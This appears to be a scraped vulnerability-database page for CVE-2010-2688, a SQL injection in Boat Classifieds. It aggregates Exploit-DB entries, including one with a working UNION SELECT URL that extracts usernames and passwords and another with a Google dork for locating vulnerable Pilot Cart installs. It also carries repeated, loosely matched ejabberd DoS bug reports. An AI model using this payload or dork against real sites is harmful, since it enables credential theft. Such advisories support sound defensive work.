CVE-2010-2688
published 2010-07-12CVE-2010-2688: SQL injection vulnerability in detail.asp in Site2Nite Boat Classifieds allows remote attackers to execute arbitrary SQL commands via the ID parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.19%
64.0th percentile
SQL injection vulnerability in detail.asp in Site2Nite Boat Classifieds allows remote attackers to execute arbitrary SQL commands via the ID parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
exploitdb·2010-11-07·CVSS 7.5
CVE-2010-4632 [HIGH] ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities
---
# Title: [ASPilot Pilot Cart 7.3 multiple vulnerabilities]
# Date: [07.11.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.pilotcart.com]
# Version: [7.3]
# CVE Reference: CVE-2008-2688 (only 1 SQL injection)
# EDB-ID: 5765 (only 1 SQL injection)
# Ariko-Security: Security Audits , Audyt bezpieczeństwa
# Advisory: 745/2010
============ { Ariko-Security - Advisory #1/11/2010 } =============
ASPilot Pilot Cart 7.3 multiple vulnerabilities
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart
# version last 7.3
Vulnerability Info:
# Type: multiple SQL injections, multiple XSS, multiple iFrame injections, multiple link injections
Exploit-DB
Boat Classifieds - SQL Injection
exploitdb·2010-06-22
CVE-2010-2688 Boat Classifieds - SQL Injection
Boat Classifieds - SQL Injection
---
Boat Classifieds
####################################################
# Category: Boat Classifieds SQL Injection Vulnerability
# Download: http://www.site2nite.com/boat-webdesign.asp
# Author: Sangteamtham [at] hcegroup[dot]net
# Homepage: HCE group.net
####################################################
Exploit:
http://server/detail.asp?ID=999999 union select
1,2,3,4,5,username,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
from tbllogin " having 1=1--
sangteamtham [at] hcegroup.net
Discovered on Fri, Jul 17, 2009
Bugzilla
ejabberd: Remote DoS via flood of client2server messages
bugzilla·2010-01-29
[LOW] ejabberd: Remote DoS via flood of client2server messages
ejabberd: Remote DoS via flood of client2server messages
Remotely exploitable DoS from XMPP client to ejabberd server
via flood of "client2server" messages (causing the message queue on
the server to get overloaded, leading to server crash) has been found.
Track of the incident:
https://support.process-one.net/browse/EJAB-1173
Upstream patches against v2.1:
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/configure?r1=2688&r2=2936&u&N
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/ejabberd_c2s.erl?r1=2911&r2=2936&u&N
CVE Request:
http://www.openwall.com/lists/oss-security/2010/01/29/1
Discussion:
*** This bug has been marked as a duplicate of bug 559921 ***
Bugzilla
ejabberd: Remote DoS via flood of client2server messages
bugzilla·2010-01-29
[LOW] ejabberd: Remote DoS via flood of client2server messages
ejabberd: Remote DoS via flood of client2server messages
Remotely exploitable DoS from XMPP client to ejabberd server
via flood of "client2server" messages (causing the message queue on
the server to get overloaded, leading to server crash) has been found.
Track of the incident:
https://support.process-one.net/browse/EJAB-1173
Upstream patches against v2.1:
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/configure?r1=2688&r2=2936&u&N
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/ejabberd_c2s.erl?r1=2911&r2=2936&u&N
CVE Request:
http://www.openwall.com/lists/oss-security/2010/01/29/1
Discussion:
*** Bug 559900 has been marked as a duplicate of this bug. ***
---
*** Bug 559893 has been marked as a duplicate of this bug. ***
---
**
Bugzilla
ejabberd: Remote DoS via flood of client2server messages
bugzilla·2010-01-29
[LOW] ejabberd: Remote DoS via flood of client2server messages
ejabberd: Remote DoS via flood of client2server messages
Remotely exploitable DoS from XMPP client to ejabberd server
via flood of "client2server" messages (causing the message queue on
the server to get overloaded, leading to server crash) has been found.
Track of the incident:
https://support.process-one.net/browse/EJAB-1173
Upstream patches against v2.1:
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/configure?r1=2688&r2=2936&u&N
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/ejabberd_c2s.erl?r1=2911&r2=2936&u&N
CVE Request:
http://www.openwall.com/lists/oss-security/2010/01/29/1
Discussion:
*** This bug has been marked as a duplicate of bug 559890 ***
Bugzilla
CVE-2010-0305 ejabberd: Remote DoS via flood of client2server messages
bugzilla·2010-01-29·CVSS 5.0
CVE-2010-0305 [MEDIUM] CVE-2010-0305 ejabberd: Remote DoS via flood of client2server messages
CVE-2010-0305 ejabberd: Remote DoS via flood of client2server messages
Remotely exploitable DoS from XMPP client to ejabberd server
via flood of "client2server" messages (causing the message queue on
the server to get overloaded, leading to server crash) has been found.
Track of the incident:
https://support.process-one.net/browse/EJAB-1173
Upstream patches against v2.1:
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/configure?r1=2688&r2=2936&u&N
https://forge.process-one.net/rdiff/ejabberd/branches/ejabberd-2.1.x/src/ejabberd_c2s.erl?r1=2911&r2=2936&u&N
CVE Request:
http://www.openwall.com/lists/oss-security/2010/01/29/1
Discussion:
This issue affects the latest versions of ejabberd package, as shipped
with Fedora 11 (ejabberd-2.1.1-1.fc11) and 12 (ejabberd
http://packetstormsecurity.org/1006-exploits/boatclassdetail-sql.txthttp://secunia.com/advisories/40263http://www.exploit-db.com/exploits/13990http://www.osvdb.org/65686http://www.securityfocus.com/bid/41046http://www.vupen.com/english/advisories/2010/1576https://exchange.xforce.ibmcloud.com/vulnerabilities/59671http://packetstormsecurity.org/1006-exploits/boatclassdetail-sql.txthttp://secunia.com/advisories/40263http://www.exploit-db.com/exploits/13990http://www.osvdb.org/65686http://www.securityfocus.com/bid/41046http://www.vupen.com/english/advisories/2010/1576https://exchange.xforce.ibmcloud.com/vulnerabilities/59671
2010-07-12
Published